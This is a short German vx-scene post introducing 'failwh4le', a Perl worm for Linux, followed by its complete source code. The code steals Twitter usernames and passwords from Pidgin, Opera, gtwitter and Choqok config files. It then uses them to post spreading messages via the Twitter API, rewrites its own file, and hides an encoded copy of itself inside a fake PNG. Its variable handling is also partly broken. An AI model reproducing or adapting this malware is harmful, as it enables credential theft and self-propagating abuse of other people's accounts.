[+]Topic: Code
[+]Von: Perforin
[+]Return: Code

Failwh4le ist ein *NIX Twitter Wurm. Dabei liest er die Login Informationen
von einigen gängigen Twitter Clients aus und benutzt dann die Twitter API
um sich zu verbreiten!

Kann jedoch nun sein, dass der Wurm so nicht mehr funktioniert, da Twitter
die Basic authentication beschränkt oder ganz abgeschaltet hat =/

#!/usr/bin/perl # failwh4le! by Perforin - vxnetw0rk use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common; use MIME::Base64; if ($^O !~ m/linux/i) { exit; } $switch = 0; open(ME,"<",$0); @me = <ME>; close(ME); if ($switch eq 0) { pidgin(); } if ($switch eq 1) { credits(); } sub credits { print decode_base64(" PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCj0gV2VsY29tZSB0byB5 b3VyIHBvbHltb3JwaGljIG5pZ2h0bWFyZSA9DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PQ0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0N Cj09PT09PT09PSBmYWlsd2g0bGUhIC0gUGVyZm9yaW4gPT09PT09PT09DQo9PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQpHcmVldHogdG86DQpTa3lPdXQNClNoYVEN ClJheWRlbg0KU3BoMW5YDQpKYWNrVA0KV2FyR2FtZQ0KDQpDb25maWNrZXIgaXMgYSBsaWUhIDpE") . "\n"; foreach $line (@me) { $encnt++; if ($line =~ m/^\$switch/) { $line = '$switch = 0;' . "\n"; } if ($line =~ m/^#failwh4le!*$/) { $line = ' ' . "\n"; } push(@vir,$line); } open(myown,">",$0); print myown @vir; close(myown); exit; } sub pidgin { open(pidgin,"<","$ENV{'HOME'}/.purple/accounts.xml") || opera(); @pidgin = <pidgin>; $lngt = scalar(@pidgin); foreach $ar (@pidgin) { $cnt++; if ($ar =~ m/\<protocol\>prpl-twitter\<\/protocol\>/) { @rest = @pidgin[$cnt..$lngt]; } } foreach $tw (@rest) { if ($tw =~ m/\<name\>(.*)\<\/name\>/) { $tname = $1; push(@TNAME,$tname); } if ($tw =~ m/\<password\>(.*)\<\/password\>/) { $tpass = $1; push(@TPASS,$tpass); } } close(pidgin); twitter(); } sub opera { open(opera,"<","$ENV{'HOME'}/.opera/widgets/widgets.dat") || gtwitter(); while (<opera>) { if ($_ =~ m/\<value id=\"val #0\" xml:space=\"preserve\"\>(.*)\<\/value\>/i) { $tuser0 = $1; push(@TNAME,$tname0); } if ($_ =~ m/\<value id=\"val #1\" xml:space=\"preserve\"\>(.*)\<\/value\>/i) { $tpass0 = decode_base64($1); push(@TPASS,$tpass0); } } close(opera); twitter(); } sub gtwitter { open(gtwitter,"<","$ENV{'HOME'}/.gconf/apps/gtwitter/%gconf.xml") || choqokrc(); while (<gtwitter>) { if ($_ =~ m/\<stringvalue\>(.*)\<\/stringvalue\>/) { $cnt++; if ($cnt == 1) { $tpass1 = $1; push(@TPASS,$tpass1); } else { $tname1 = $1; push(@TNAME,$tname1); } } } close(gtwitter); twitter(); } sub choqokrc { open(choqokrc,"<","$ENV{'HOME'}/.kde/share/config/choqokrc") || die && print "Get choqokrc as your new twitter client!"; while (<choqokrc>) { if ($_ =~ m/password=(.*)/) { $tpass2 = $1; push(@TPASS,$tpass2); } if ($_ =~ m/username=(.*)/) { $tname2 = $1; push(@TNAME,$tname2); } } close(choqokrc); twitter(); } sub twitter { @agents = ('Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)', 'Mozilla/5.0 (compatible; Konqueror/3.2; Linux 2.6.2) (KHTML, like Gecko)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8', 'Mozilla/5.0 (OS/2; U; Warp 4.5; de; rv:1.8.1.11) Gecko/20071129 PmWFx/2.0.0.11', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.A.B.C Safari/525.13', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10', 'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)', 'Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00'); @payload = ('Gimme all your Twitter Logins =)', 'Hey I execute every perl skript I get! #failwh4le', 'failwh4le on his way to world domination!', 'vxnetw0rk - german vx community', 'failwh4le! by Perforin - vxnetw0rk'); $paymsg = @payload[int(rand(5))]; $slengthpaymsg = length($paymsg); $useragent = LWP::UserAgent->new; $useragent->request(POST 'http://twitter.com/statuses/update.xml', User-Agent => @agents[int(rand(11))], Authorization => "Basic " . encode_base64("@TNAME:@TPASS"), Host => 'twitter.com', Accept => '*/*', Content-Length => $lengthpaymsg, Content-Type => 'application/x-www-form-urlencoded', Content => [ status => $paymsg ] ); out(); } sub out { foreach $line (@me) { $encnt++; if ($line =~ m/^\$switch/) { $line = '$switch = 1;' . "\n"; } if ($line =~ m/^\s*$/) { $line = '#failwh4le!' . "\n"; } push(@vir,$line); } mkdir("$ENV{'HOME'}/.failwh4le!",0777); open(vir,">","$ENV{'HOME'}/.failwh4le!/failwh4l3!.PNG") || unlink $0; print vir decode_base64(" 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"); @abgang = encode_base64(@vir); foreach $wsx (@abgang) { $wsx =~ tr/a-zA-Z/N-ZA-Mn-za-m/; print vir $wsx; } print vir '#Maybe you will find me here or not. failwh4le is on his way!'; close(vir); exit; }